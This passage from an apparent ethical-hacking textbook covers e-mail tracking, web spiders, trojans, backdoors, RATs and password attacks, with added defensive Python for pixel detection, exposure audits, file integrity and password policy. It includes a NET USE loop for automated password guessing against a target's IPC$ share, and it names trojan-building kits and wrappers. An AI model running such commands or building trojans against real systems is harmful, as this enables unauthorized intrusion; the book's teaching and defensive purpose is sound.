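The single TTL=1 TCP packet at the end is not flagged: one expiring packet is noise, a climbing series from one source is a trace.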

9. E-mail Tracking

E-mail tracking programs let the sender know what the recipient does with an e-mail: whether it is read, forwarded, modified, or deleted. Most e-mail tracking programs operate at the server of the e-mail domain. An invisible graphic file is attached to the e-mail sent to the recipient; this file is not visible to the reader. When an action is taken on the e-mail, the attached file reports that action back to the server. You often see such files attached to e-mails under familiar names such as noname or noread.

Hacking tool

eMailTracking Pro and MailTracking.com are tools that help a hacker track e-mail. When these tools are used, every activity on the message, such as sending, replying, forwarding, or editing it, is reported to the manager, and the sender receives these notifications automatically.
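The invisible graphic described above is, in HTML mail, an ordinary image tag whose source is a remote URL carrying a per-recipient token, so fetching it tells the sender's server that the message was opened. As an added example, not from the book, the following Python inspects an HTML message for such beacons: remote images that are 1x1, hidden by style, or carry a long unique token. The sample message, the host names (reserved .test domains) and the function names are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed HTML message: a real logo, two beacons, and an inline (cid:) image.
EMAIL_HTML = """
<html><body>
<p>Hello, please see the attached report.</p>
<img src="https://cdn.example-corp.test/logo.png" width="120" height="40">
<img src="https://track.mailer-example.test/open?id=7f3a9c2b8d1e4f60a1b2" width="1" height="1">
<img src="https://track.mailer-example.test/p/3kd92ls0f7xq8v1nbe5mz4tw.gif" style="display: none">
<img src="cid:part1.inline@example-corp.test" width="1" height="1">
</body></html>
"""


class _ImgCollector(HTMLParser):
    """Collect the attribute dictionary of every <img> in the message body."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append(dict(attrs))


def _dimension(value):
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return None                      # unknown size is not evidence of a beacon


def _looks_like_token(url):
    """Long opaque path segment or query value: a per-recipient identifier."""
    tail = url.path.rsplit("/", 1)[-1]
    query_values = [v for values in parse_qs(url.query).values() for v in values]
    return len(tail) >= 24 or any(len(v) >= 16 for v in query_values)


def find_tracking_pixels(html, trusted_hosts=()):
    collector = _ImgCollector()
    collector.feed(html)
    hits = []
    for img in collector.images:
        url = urlparse(img.get("src") or "")
        if url.scheme not in ("http", "https"):   # cid:/data: images cannot phone home
            continue
        w, h = _dimension(img.get("width")), _dimension(img.get("height"))
        tiny = w is not None and h is not None and w <= 1 and h <= 1
        hidden = "display:none" in (img.get("style") or "").replace(" ", "").lower()
        checks = (("1x1", tiny), ("hidden", hidden), ("unique-token", _looks_like_token(url)))
        reasons = [name for name, flag in checks if flag]
        if reasons and (url.hostname or "") not in trusted_hosts:
            hits.append({"host": url.hostname, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_tracking_pixels(EMAIL_HTML):
        print(hit)
```

The practical mitigation is the one most mail clients offer: do not load remote images automatically, which leaves the beacon unfetched and the sender uninformed.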

10. Gathering Information from the Web (Web Spiders)

A web spider is a technology for collecting information from the Internet. It is the method that spammers, or anyone interested in e-mail addresses, use to build useful lists of addresses. Web spiders use syntax, such as the @ symbol, to recognize e-mail addresses and then copy them into a database. The data is collected to serve other purposes. Hackers can use web spiders to gather all kinds of information on the Internet. One method of deterring spiders is to add a robots.txt file to the root directory of the website listing the directories to be protected. You will learn more about this topic in the section on Web Hacking.

Hacking tool

1st Email Address Spider and SpiderFoot are tools that let us collect e-mail addresses from websites across different domains. Spammers use these tools to harvest e-mail addresses in bulk for their spam campaigns.
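From the site owner's side, the same @-pattern scan is a useful pre-publication audit, and robots.txt deserves a caveat: it is advisory only, a spider that ignores it is unaffected, and the file itself advertises the paths the owner wants hidden. As an added example, not from the book, the following Python scans a few constructed pages for addresses in the organization's own domain and lists the paths that are protected by nothing more than a robots.txt Disallow line. The page contents, domain names and function names are my own.

```python
import re
from urllib import robotparser

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed site content (not a real site): URL path -> HTML body.
PAGES = {
    "/about.html": "<p>Contact our CTO at <a href='mailto:jane.doe@example.org'>jane.doe@example.org</a></p>",
    "/partners.html": "<p>Vendor support: help@vendor-example.test</p>",
    "/staff/": "<ul><li>bob@example.org</li><li>alice at example dot org</li></ul>",
    "/news.html": "<p>Nothing to see here.</p>",
}
ROBOTS_TXT = "User-agent: *\nDisallow: /staff/\nDisallow: /internal/\n"


def exposed_addresses(pages, org_domain):
    """Addresses in the organization's own domain, with the pages that publish them."""
    found = {}
    for path, html in pages.items():
        for addr in set(EMAIL_RE.findall(html)):
            if addr.lower().endswith("@" + org_domain.lower()):
                found.setdefault(addr.lower(), []).append(path)
    return found


def robots_only_paths(pages, robots_txt):
    """Paths a polite spider skips; an impolite one reads them and the robots file too."""
    rp = robotparser.RobotFileParser()
    rp.parse(robots_txt.splitlines())
    return sorted(p for p in pages if not rp.can_fetch("*", p))


if __name__ == "__main__":
    print("exposed:", exposed_addresses(PAGES, "example.org"))
    print("relying on robots.txt only:", robots_only_paths(PAGES, ROBOTS_TXT))
```

In the sample, the obfuscated "alice at example dot org" is not matched, and the staff directory is flagged because a Disallow line is the only thing standing between it and a harvester; access control on the server is the real protection.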

11. Summary

You should understand the following points clearly. Footprinting is the technique of tracking down information about the target, and it must be performed first in the attack process. You can track the target through the company's website and through information shared on the network; this information is shared publicly and is not restricted by law. As an administrator, you need to weigh that information and decide what must be kept secret. Use information-gathering tools such as Whois, Nslookup, and Traceroute. E-mail tracking and web information gathering techniques should also be understood.


CHAPTER 9: TROJANS, BACKDOORS

Trojans and backdoors are two methods hackers use to gain unauthorized access to a target system. They come in different forms, but they have one thing in common: the hacker must install another program on the target computer, or the user must be tricked into installing the Trojan or backdoor on their own computer. Trojans and backdoors are also useful tools for ethical hackers (white hat hackers) and system administrators, who use them to test computers and networks.

Viruses and worms can be used to damage computers and networks just like Trojans and backdoors. In fact, many viruses carry a Trojan into the system, after which the hacker leaves behind a backdoor. In this chapter we discuss the similarities and differences between Trojans, backdoors, viruses, and worms. All of them are collectively called malicious programs or malicious code (malware). This is an important topic for the ethical hacker, because it is the most common way systems are compromised.

1. Malware and the Basics

Before getting into the main content of the lesson, we should take the time to understand what malware is and the forms its activity takes.

What is malware?

The broadest term is malware, or malicious code, which is what the rest of this document calls it. Malicious code is defined as a program that is secretly inserted into a system with the purpose of compromising the confidentiality, integrity, or availability of that system. Traditionally, we have lumped every program that can harm a computer under the single name "virus". This is unfair to the virus, which is only a small part of the harmful programs out there. The definition of malware covers many categories we are used to calling viruses, such as worms, trojans, spyware, and actual viruses, as well as the system attack toolkits that hackers commonly use: backdoors, rootkits, keyloggers, and so on.

Classifying Malware

Before analyzing the forms of malware, one thing must be noted: there are many ways to categorize malware, for example by function, by mode of operation, or by the harm it causes. A given piece of malicious code does not necessarily fall into one fixed category; more precisely, it is usually a combination of one or more of the basic forms below. The purpose is to make the malicious code more versatile in its functions, more varied, and better able to evade security software.

Virus

A virus is a type of malicious code capable of replicating itself and infecting files, programs, or computers. By this definition, a computer virus must always attach itself to a host (a data file or an application file) in order to spread. Antivirus programs rely on this property to prevent and remove viruses, scanning the files on storage devices and scanning files before they are written to disk. It also explains why antivirus software on a PC sometimes reports that it has detected a virus but cannot remove it when it sees signs of virus activity on the PC: the object carrying the virus is on another machine, so the malicious code cannot be deleted.

Compiled Virus

A compiled virus is one whose executable code has been fully compiled by a compiler, so it can execute directly under the operating system. The boot viruses (such as Michelangelo and Stoned) and file viruses (such as Jerusalem) that were so common in the 1980s belong to this group. A compiled virus can also be a hybrid of boot virus and file virus in the same version.

Worm

A worm is also a program capable of replicating and infecting a system on its own, but it is able to propagate itself, meaning a worm does not need a host file to carry it when it infects a system. Consequently, scanning files alone will not remove a worm from a system, because a worm does not attach to a file or to a region of the hard disk. A worm's objectives include wasting network bandwidth and damaging the system by deleting files, creating backdoors, dropping keyloggers, and so on. Worm attacks are characterized by extremely rapid spread, since they require no human action (such as booting the machine, copying files, or opening and closing files). Worms can be divided into two kinds:

- Network Service Worms spread by exploiting security holes in the network, the operating system, or an application. Sasser is an example of this kind of worm.
- Mass Mailing Worms attack through the mail service, but they send themselves out to attack and infect rather than attaching to an e-mail as a host. When such a worm infects a system, it usually tries to find the address book and send itself to every address it collects. Sending to all addresses at once often overloads the network or the mail server. Netsky and Mydoom are examples of this kind.

Trojan Horse

A Trojan horse is a type of malicious code named after the legend of the Trojan horse. The Trojan acts as a spy under the direction of the attacker. A Trojan horse does not replicate itself; it enters the system looking very harmless, but inside it contains code with a harmful purpose. A Trojan can cause harm in one of three ways:

- Continue performing the functions of the program it is attached to, while separately performing harmful actions (for example, a game offered to the user alongside a password-stealing program).
- Continue performing the functions of the program it is attached to, but modify some of them to cause harm (for example, a trojan that fakes a login window to steal passwords) or to hide other destructive actions (for example, a trojan that hides other malicious processes by turning off the system's displays).
- Execute a harmful program outright under the guise of a harmless one (for example, a trojan presented as a game or a network tool; as soon as the user runs the file, the data on the PC is deleted).

Depending on their purpose, trojans can be divided into the following basic types:

- Remote Access Trojans (RATs), used to take remote control of a system
- Data-Sending Trojans, used to find and send data to the intruder
- Destructive Trojans, used to delete and corrupt files on the system
- Denial-of-Service Trojans, used for denial-of-service attacks
- Proxy Trojans, used to create hidden data tunnels or to launch attacks on other systems
- FTP Trojans, used to create an FTP server on the victim machine and copy data
- Security Software Disabler Trojans, used to detect and stop antivirus programs

Tracking Cookie

A tracking cookie is a form of cookie abuse used to track a user's web browsing activity without permission. A cookie is a data file containing information about a web client's use of a particular website. The purpose of keeping cookies on the computer is to let the website tailor its interface and behavior to each web client. However, this feature is abused to build spyware that collects private information about an individual's browsing behavior.

Malicious Mobile Code

Malicious mobile code is software that can be sent from a remote location to run on a system without an explicit execution request from that system's user. It is considered different from viruses and worms in that it does not infect files and does not try to propagate itself. Rather than exploiting a specific security weakness, this kind of attack usually affects the system by taking advantage of the default privileges granted to remotely supplied code. Programming technologies such as Java, ActiveX, JavaScript, and VBScript are good environments for malicious mobile code. One of the best-known examples of this kind of attack is Nimda, which used JavaScript.

Nimda's attack is often described as a blended attack. The attack can arrive by e-mail, when the user opens a message with a web browser. After infecting that machine, Nimda tries to use the machine's e-mail address book to spread to other machines. From the infected machine, Nimda also scans other machines on the network for unprotected shares and uses the NetBIOS service to transfer the infected file to them. At the same time, Nimda probes for computers running the IIS service with a Microsoft security weakness; when it finds one, it copies itself to the server. If a web client with a matching weakness connects to that website, the client is also infected (note that it is infected without opening an infected e-mail). The infection thus spreads exponentially.

Virus Hoax

A virus hoax is a false virus warning. Hoaxes usually take the form of an urgent request to protect the system. The goal of a hoax is to get as many people as possible to forward the warning by e-mail. The hoax itself does no direct harm, but the messages spreading it may carry malicious code, or the hoax may contain instructions to reconfigure the operating system or delete files, which damages the system. Hoaxes also waste time and burden technical support when too many people call in asking for help.
Attacker Tool

Attacker tools are toolkits that can be used to push malicious software into a system. They can give the attacker unauthorized access to the system or infect it with malicious code. When they are loaded into the system by malicious code, attacker tools can be part of that code (for example, within a trojan) or can be loaded onto the system after infection. For example, a system infected with a worm may be directed by the worm to connect automatically to a website, download an attacker tool, and install it. The most common attacker tools are backdoors and keyloggers.

A backdoor is a general term for malicious software that resides on a system and waits for control commands on TCP or UDP service ports. In the simplest case, most backdoors let an attacker perform actions on the infected machine such as transferring files, guessing passwords, and executing commands. Backdoors can be considered in two forms: zombies and remote administration tools.

A zombie (sometimes called a bot) is a program installed on a system for the purpose of attacking other systems. The most common type of zombie is the agent used to mount a DDoS attack: the attacker installs zombies on a large number of computers and then orders them all to attack at once. Trinoo and Tribe Flood Network are two well-known zombies.

A keylogger is software used to secretly record the keys pressed on the keyboard and send them to the hacker. A keylogger can capture the contents of e-mails and documents, usernames, passwords, and other secret information. Examples of keyloggers are KeySnatch and Spyster.

Rootkits are collections of files installed on a system to turn its standard functions into functions that conceal dangerous attacks. On Windows, for example, a rootkit can modify or replace files, or reside in memory to replace or modify operating system function calls. Rootkits are commonly used to install attack tools such as backdoors and keyloggers. Examples of rootkits are LRK5, Knark, Adore, and Hacker Defender.

Phishing

Phishing is a form of attack that is often combined with malicious code. It is the practice of luring users into connecting to and using a counterfeit computer system so that they reveal secret identity information (passwords, account numbers, personal details, and so on). Phishers usually create web pages or e-mails that look identical to those the victim normally uses, such as the bank's site or the credit card company's. The fake e-mail or page asks the victim to change or provide account secrets such as passwords. That information is then used to steal money directly from the account or for other illegal purposes.

2. Backdoors
A backdoor is a program, or something related to a program, that a hacker installs on the target system so that he can get back into it later. The purpose of a backdoor is to defeat the evidence that the system's logging would otherwise provide. It also helps the hacker hold on to his access when an administrator detects the intrusion and tries to remediate it.

Creating a new service is the basic technique discussed for backdoors on Windows. Before installing a backdoor, the hacker scans the target system for the services that are running. The hacker can then add a service and give it an inconspicuous name, or reuse a service that is never used, one that is either activated manually or disabled altogether. This technique is effective because when an administrator troubleshoots the system he usually finds leftover items on it anyway, so such services are never examined carefully. The backdoor technique is simple but effective: the hacker can return to the compromised computer several times afterwards. The service created by the backdoor usually runs with high privileges, such as the system account.

Remote Administration Trojans (RAT)


A RAT is a class of backdoor used to enable remote control over a compromised computer. It provides functions for the user to operate, and at that point a network port is opened on the victim's computer. Once the RAT is started it executes along with files and applications, then manipulates registry keys to start its process, and sometimes it creates services owned by the system. Unlike an ordinary backdoor, a RAT hooks into the victim's operating system and always comes packaged as two files: a client-side file and a server-side file. The server file is installed on the victim's computer, and the client file is used by the intruder to control the compromised system.

Overt channels and covert channels


An overt channel is one created legitimately so that programs can communicate with each other within a system or network environment. Protocols are the typical example of overt channels.

A covert channel, by contrast, is created in secret from the user: a program that is not above board uses it to communicate and exchange information without the user's permission. Covert channels usually (can) hide beneath overt channels to talk to the outside world. For example, the HTTP service on port 80 is meant for web traffic and serves web pages; that is the overt channel. A covert channel abuses the service on that port to send information that is not permitted to web servers. A more sophisticated covert channel sends its information in the exact format of some other communication. An example of this kind is an SSH service on port 80 where the data sent over the SSH connection (appears to) conform to the format of ordinary HTTP (naturally both the SSH client and server would be custom-built programs).
Hacking Tool

Loki is a hacking tool that provides a command-line shell over ICMP. From this program the hacker can execute commands on the victim's computer.

3. What is a Trojan?
A Trojan is a malicious program disguised as something that looks harmless. Trojans are usually downloaded inside another program or a fake application. Once installed on a machine, a Trojan can steal or corrupt data, or make the system fail or slow down. They can also serve as a launching point for DDoS attacks. Some Trojans can be used to manipulate files on the victim computer, manage processes, control a remote command line, log keystrokes, record the screen, and start or shut down the machine. One technique lets the Trojan connect itself, that is, the computer that distributed the Trojan with the infected or spreading computer, over an IRC channel (Internet Relay Chat, a service for chatting over the network).

A Trojan is usually attached to another program and installed on the computer without the user's knowledge. Trojans reach the victim system by means such as Instant Messenger (IM), IRC, e-mail attachments and NetBIOS. The programs most often carrying Trojans come in a legitimate-looking guise: freeware, anti-spyware tools, system optimizers, screen savers, music, pictures, games and video. Any of them can carry a dangerous Trojan when you install it on your system. Invitations to free programs, music files, movies and content designed to tempt the user or arouse curiosity (pornographic films, for instance) may all have a Trojan planted inside. Once such a program gets into the system and gains access rights, it proceeds to destroy things or issue commands to the computer. The table below describes several kinds of Trojan and the ports they commonly use to communicate with their target.

Run netstat -an at the CMD prompt to see the state of the ports.

4. The different kinds of Trojan


Trojans have developed into many different varieties. Below are a few of the common ways Trojans operate.

- Remote Access Trojans: used to control the computer remotely.
- Data-Sending Trojans: used to search for data on the system and send it to the hacker.
- Destructive Trojans: used to delete or corrupt files on the system.
- Denial of Service Trojans: used in denial-of-service attacks.
- Proxy Trojans: used to create a tunnel for sending or launching a program on the victim system.
- FTP Trojans: used to set up an FTP service and copy file resources.
- Security software disabler Trojans: used to stop antivirus programs.

Reverse Connect Trojans

This technique lets a hacker reach a computer inside an internal network from the outside. The hacker installs a simple Trojan on the internal network, Reverse WWW Shell for example. After some time the internal server tries to reach the master system to execute some command. If the hacker has left malicious command sequences on the master system, they are executed on the computer inside the internal network. Reverse WWW Shell uses standard HTTP. It is very dangerous because it is hard to detect: it looks like an internal client browsing the web. The figure below illustrates a Reverse Connect Trojan in action. Yuri is a hacker whose computer is listening on port 80, the web service port. By some means he gets the program server.exe onto Rebecca's computer. When server.exe runs on Rebecca's machine it reports back to Yuri, who then has full control of Rebecca's computer.

Hacking Tool

You can use the Nuclear RAT Trojan tool for this attack technique. It builds the server.exe file from the example above and remotely controls the victim's computer once the victim installs server.exe.

Wrapper technique

A wrapper is a software package used to attach a Trojan. The wrapper binds an ordinary file to the Trojan; both the ordinary file and the Trojan are placed in a single executable and installed when that program is run. Games and other tempting programs (pornographic films) are commonly used as wrappers because they appeal to human desire. This way the user pays no attention to the slowdown in system performance while the Trojan is being installed; the user only sees the program he wanted to install. Here is an example to make this clearer. A chess program is 90 KB in size; with a Trojan attached it grows to 110 KB. An ordinary user does not notice the difference in size, and the game's maker has no idea its product is carrying a Trojan as it spreads across the network.

Hacking Tool

Graffiti is an amusing game with a Trojan planted by the wrapper method. The moment the user enters the game world, the Trojan goes to work.

ELiTeWrap is a Windows program that comes as an exe file. It helps build an installation routine for a program, with steps such as accepting the licence, copying files, installing, and, indispensably, it lets us attach a Trojan to that installation process. IconPlus is a program for converting between icon formats. An attacker can embed malicious code or a Trojan into an icon; the user has no idea he is running a Trojan sample and believes he is simply running the application.

Building and controlling Trojans

Several tools help hackers build Trojans of their own. These tools (called toolkits) let the hacker generate and heavily customise his Trojan. Such toolkits are often dangerous, since they can backfire if used incorrectly. A freshly built Trojan brings many advantages: it usually goes undetected by security programs, because they have no data on the new sample yet.
Hacking Tool

Some tools worth naming are Senna Spy Generator, Trojan Horse Construction Kit v2.0, Progenic Mail Trojan Construction Kit and Pandora's Box.

5. Defending against Trojans


Many commercial antivirus tools also detect spyware, Trojans, backdoors and other malicious code. Such software usually includes a function to detect and remove malware, and of course there are several ways to carry out the removal. Because many infected files are tied to the system, operating system files for example, removing them outright can leave the system unable to run. Activity-monitoring tools are also useful for spotting unfamiliar programs running on the machine. The key point in how Trojans and backdoors operate is that a program gets installed on the computer, so the best way to avoid Trojan infection is not to let ordinary users install programs at will. Below are recommendations for guarding against Trojans effectively.

- Limit shared use of the computer and set a protective password.
- Do not open unfamiliar files of unknown origin; pay attention to files with extensions such as exe, bat, com, ...
- Do not visit unfamiliar websites or click on unfamiliar links.
- Do not install unfamiliar software.
- Scan the open ports with tools such as Netstat, Fport and TCPView.
- Scan the running processes with Process Viewer, What's on my computer and Insider.
- Scan for changes in the Registry with MsConfig and What's running on my computer.
- Scan network activity with Ethereal or Wireshark.
- Run anti-Trojan software.

Hacking Tool

Fport produces a report on TCP/IP activity on the network, showing us which applications are active and connected to the Internet. TCPView is a tool available on Windows for viewing the state of TCP and UDP traffic, including network access, data exchange and the source and destination addresses of packets. Tripwire is a tool for computing hash tables for files: it runs the original file through some algorithm and produces a string of digits, and the receiving side uses the program to recompute the value for the file it received. If the two hashes do not match, the file may have a Trojan attached.
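The hash-comparison idea behind Tripwire, as an added Python example that is neither from the original text nor Tripwire's own code: it records a SHA-256 digest and size for every file in a directory, then reports files that changed, appeared or vanished. The demo directory, the chess.exe stand-in and the appended 20 KB payload are constructed to mirror the 90 KB to 110 KB wrapper example above.

```python
import hashlib
import tempfile
from pathlib import Path

CHUNK = 64 * 1024


def file_digest(path, algorithm="sha256"):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Snapshot every regular file under root: relative path -> digest and size."""
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            rel = p.relative_to(root).as_posix()
            baseline[rel] = {"sha256": file_digest(p), "size": p.stat().st_size}
    return baseline


def verify(root, baseline):
    """Compare the directory against the baseline; a digest mismatch is the Tripwire alarm."""
    current = build_baseline(root)
    changed = sorted(f for f in baseline if f in current
                     and current[f]["sha256"] != baseline[f]["sha256"])
    return {
        "changed": changed,
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        # size growth per changed file, the symptom of the wrapper example (90 KB -> 110 KB)
        "size_delta": {f: current[f]["size"] - baseline[f]["size"] for f in changed},
    }


def demo():
    """Constructed scenario: baseline a directory, then simulate a wrapper adding a payload."""
    game = b"MZ" + b"\x00" * (90 * 1024 - 2)      # stand-in for the 90 KB chess program
    payload = b"\x90" * (20 * 1024)                 # stand-in for a 20 KB attached trojan
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "chess.exe").write_bytes(game)
        (root / "readme.txt").write_text("original readme\n")
        baseline = build_baseline(root)
        # Tampering: chess.exe is "wrapped", a dropper appears, a file disappears
        (root / "chess.exe").write_bytes(game + payload)
        (root / "server.exe").write_bytes(b"MZ constructed dropper")
        (root / "readme.txt").unlink()
        return verify(root, baseline)


if __name__ == "__main__":
    report = demo()
    for kind in ("changed", "added", "removed"):
        print("%-8s %s" % (kind + ":", ", ".join(report[kind]) or "-"))
    for name, delta in report["size_delta"].items():
        print("%s grew by %d bytes" % (name, delta))
```

A real deployment keeps the baseline on read-only or offline media, since an attacker who can rewrite the baseline can hide the change.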

6. Summary
By the end of this lesson you should have a firm grasp of the following points:

- What a Trojan is: a Trojan is a piece of code hidden inside another piece of software or application that gets installed on the computer.
- What a covert channel is: a covert channel communicates over ports it is not legitimately entitled to; basic uses of covert channels are ICMP tunneling and the reverse WWW shell.
- What a backdoor is: a backdoor is usually used as part of a Trojan; it creates a secret back door through which the hacker can return to the system later.
- How Trojans work: the essential requirement is that they get installed on the computer.
- Defending against Trojans: the simplest way is to install an antivirus program on the computer.


CHAPTER 8: SYSTEM HACKING


In the previous chapters we went through the process of gathering information about the target of an attack. Techniques such as Footprinting, Social Engineering, Enumeration and Google Hacking were applied to track down information.

In this chapter you begin the actual process of attacking a system. Your target is now clearly in front of you, and you have to apply various techniques to get into that system and do what you want there, such as deleting data or running a trojan or keylogger ...

The system attack process

Figure 8.1: The system attack process

Before going on with System Hacking, let us spend a little time understanding a system attack process. The target before us is a computer system. The steps of the attack, as laid out, can be listed as in the figure alongside. There are six stages:

1. Enumerate: extract all information obtainable about the users on the system. Use SNMP probing to obtain more useful and accurate information; you studied the SNMP method in an earlier section.
2. Crack: this stage is probably the one that attracts hackers most. It requires us to break a user's login password or, by some other means, reach the goal of gaining access to the system.
3. Escalate: put simply, move the access level from an ordinary user up to admin or a user with higher privileges for our attack.
4. Execute: run applications on the target machine. Prepare malware, a keylogger, a rootkit and so on beforehand to run on the attacked computer.
5. Hide: executables, source files that run the program and the like must be hidden so the target cannot detect and remove them.
6. Tracks: not to leave tracks, of course. Any information that points to you must be wiped clean, leaving nothing behind; otherwise the chance of being identified as the intruder is very high.

In this chapter you will go through the techniques for carrying out the steps above to attack a system, and from there we will present countermeasures against those attacks. Enumeration was covered in the previous chapter and is not repeated here.

Part 1: Cracking Passwords


1. Passwords and types of password attack
Several kinds of password are used to access a system. The characters used in a password can fall into the following cases:

- Letters only, e.g. ABCDJ
- Digits only, e.g. 457895
- Special characters only, e.g. #$^@&*
- Letters and digits, e.g. asw04d5s
- Digits and special characters only, e.g. #$345%4#4
- Letters, digits and special characters, e.g. P@ssw0rd

The strength of a password depends on how susceptible it is to a hacker. The following rules, recommended by EC-Council, must be applied when you create a password in order to protect it against attack:

- It must not contain the user's account name.
- It must be at least 8 characters long.
- It must contain characters from at least three of the following groups:
  o special characters;
  o digits;
  o lower-case letters;
  o upper-case letters.
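As an added example that is not part of the original text, the Python code below checks a candidate password against the rules just listed and also reports which of the character groups from the earlier list it draws on. The sample passwords are the ones shown on this page; the account names are made up.

```python
import re

# Character groups named in the rules above: a password must draw on at least
# MIN_CLASSES of them and be at least MIN_LENGTH characters long.
CLASSES = {
    "upper": re.compile(r"[A-Z]"),
    "lower": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}
MIN_LENGTH = 8
MIN_CLASSES = 3


def composition(password):
    """Describe a password with the three broad groups used in the list above
    (letters, digits, special characters), e.g. 'letters and digits'."""
    groups = []
    if re.search(r"[A-Za-z]", password):
        groups.append("letters")
    if re.search(r"[0-9]", password):
        groups.append("digits")
    if re.search(r"[^A-Za-z0-9]", password):
        groups.append("special characters")
    if not groups:
        return "empty"
    if len(groups) == 1:
        return groups[0] + " only"
    return ", ".join(groups[:-1]) + " and " + groups[-1]


def check_password(password, username):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    # Rule 1: must not contain the account name (compared case-insensitively)
    if username and username.lower() in password.lower():
        problems.append("contains the account name")
    # Rule 2: minimum length
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    # Rule 3: at least three of the four character classes
    present = [name for name, rx in CLASSES.items() if rx.search(password)]
    if len(present) < MIN_CLASSES:
        problems.append("uses only %d of %d character classes (%s)"
                        % (len(present), len(CLASSES), ", ".join(present) or "none"))
    return problems


if __name__ == "__main__":
    # Sample passwords are those shown on this page; the account names are made up.
    samples = [("alice", "ABCDJ"), ("alice", "457895"), ("alice", "#$^@&*"),
               ("alice", "asw04d5s"), ("alice", "#$345%4#4"), ("alice", "P@ssw0rd"),
               ("administrator", "Administrator1!")]
    for user, pw in samples:
        verdict = check_password(pw, user)
        print("%-16s %-38s %s" % (pw, composition(pw),
                                  "OK" if not verdict else "; ".join(verdict)))
```

Note that P@ssw0rd satisfies all four rules yet is a well-known dictionary variant, which is exactly what the hybrid attack described later is built to find; policy rules are a floor, not a guarantee.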

A hacker uses various attacks to find a password and get further into the system. The common types of password attack are as follows:

Figure 8.2: Types of password attack

- Passive Online: eavesdropping on password exchanges on the network. Passive online attacks include sniffing, man-in-the-middle and replay attacks.
- Active Online: guessing the administrator's password. Active online attacks include automated password guessing.
- Offline: attacks such as dictionary, hybrid and brute-force.
- Non-Electronic: attacks that rely on the human factor, such as social engineering and phishing.

Passive Online Attacks

A passive online attack is sniffing the network to find traces of passwords. Passwords are captured during authentication and can then be compared against a dictionary or word list. User account passwords are usually hashed or encrypted before being sent over the network to prevent unauthorized access and use. When a password is protected in that way, some special tools help the hacker break the algorithm that encrypted it.

Active Online Attacks

The easiest way to gain administrator-level access to a system is to guess a simple password, on the assumption that administrators use simple passwords. Password guessing is the attack. Active online attacks rely on the human factor involved in creating passwords, and this type of attack only works against weak passwords. In chapter 6, when we discussed the Enumeration phase, you learned about the weaknesses of NetBIOS enumeration and null sessions. Given that NetBIOS TCP port 139 is open, the most effective way to break into a Windows NT or Windows 2000 system is to guess the password, by trying to connect to the system the way an administrator would: an account and password are combined to log in to the system.

A hacker might first try to connect to a default share such as Admin$, C$ or C:\Windows. To connect to a computer's drives or shares, type the following in Start > Run: \\ip_address\c$. Automated programs can quickly generate dictionary files, word lists or every possible combination of letters, digits and special characters and attempt to log in. Most systems block this kind of attack by setting a maximum number of login attempts before the account is locked (for example, when you log in to a website and enter the wrong password 5 times, your account is automatically locked for a day). In the following sections we discuss how a hacker can perform automated password guessing more rigorously, as well as countermeasures against such attacks.

Performing Automated Password Guessing

To speed up password guessing, hackers usually use automated tools. One procedural, easy way to automate password guessing is to use the command window with the standard syntax of the NET USE command. To build a simple script for automated password guessing, take the following steps:

1. Create a simple username and password file using Notepad. Use command lines to generate the dictionary lists, then save the file to drive C as credentials.txt.
2. Use the FOR command: C:\> FOR /F "tokens=1,2*" %i in (credentials.txt)
3. Type do net use \\targetIP\IPC$ %i /u:%j to use credentials.txt to try to log on to the hidden share on the target system.

Protecting against password guessing

Two issues exist: protecting against password guessing and against password attacks. Both kinds of attack are clever enough to create insecurity when users create their own passwords. A user can also be authenticated and validated by verification that requires two forms of identification (such as a smart card and a password) when authenticating the user. By requiring something the user has (the smart card) and something the user knows (the password), security is increased and the attack is not easy.

Offline Attacks

An offline attack is carried out somewhere other than at the computer that holds the password or where the password is used. Offline attacks require hardware for physical access to the computer so that the password files can be copied from the system onto removable media. The hacker then has the file and goes on to exploit the security weakness. The following table illustrates several kinds of offline attack:

Table 8.1: Types of offline attack

  Type of attack       Characteristics                                 Example password
  Dictionary attack    Tries passwords taken from a dictionary         Administrator
  Hybrid attack        Substitutes a few characters of the password    Adm1n1strator
  Brute-force attack   Changes every character of the password         Ms!tr245@F5a

Dictionary Attack is the simplest and fastest of the attack types. It is used to find a password that actually exists as a word in a dictionary. Most commonly the attack uses a dictionary file of possible words together with the algorithm used by the authentication process: the hashes of the dictionary words are compared with the hash of the password the user entered at login, or with the passwords stored in a file on the server. A dictionary attack only works if the password is an entry in the dictionary, so it has the limitation that it cannot be used against strong passwords containing digits or other symbols.

Hybrid Attack is the hacker's next level, attempted when the password cannot be found with a dictionary attack. A hybrid attack starts from a dictionary file and substitutes digits and symbols for characters in the password. For example, many users append a 1 to the end of their password to satisfy a strong-password requirement; hybrid attacks are designed to find those kinds of variation.

Brute Force Attack uses a brute-force algorithm that tries every possible combination of upper- and lower-case letters, digits and symbols. A brute-force attack is the slowest of the three because of how many characters a password can combine, but it is effective given enough time and processing power.

Nonelectronic Attacks are attacks that use no technical knowledge at all. They include techniques such as social engineering, shoulder surfing, keyboard sniffing and dumpster diving.

2. Microsoft Authentication
Microsoft has produced a series of authentication protocols for its client and server operating systems, applicable in both workstation and domain environments. The protocols are listed in the figure along with the operating system versions that use them. Each authentication protocol encrypts data differently and uses a different key length. Table 8.2 below gives the encryption information for the basic authentication types.

Figure 8.3: Microsoft authentication protocols
Table 8.2: Basic authentication information

The NTLM authentication protocol


NTLM uses a challenge-response mechanism to authenticate users and computers running Windows Me or earlier, or computers running Windows 2000 or later that are not part of a domain. The user is challenged to supply some piece of information unique to that user (the response).

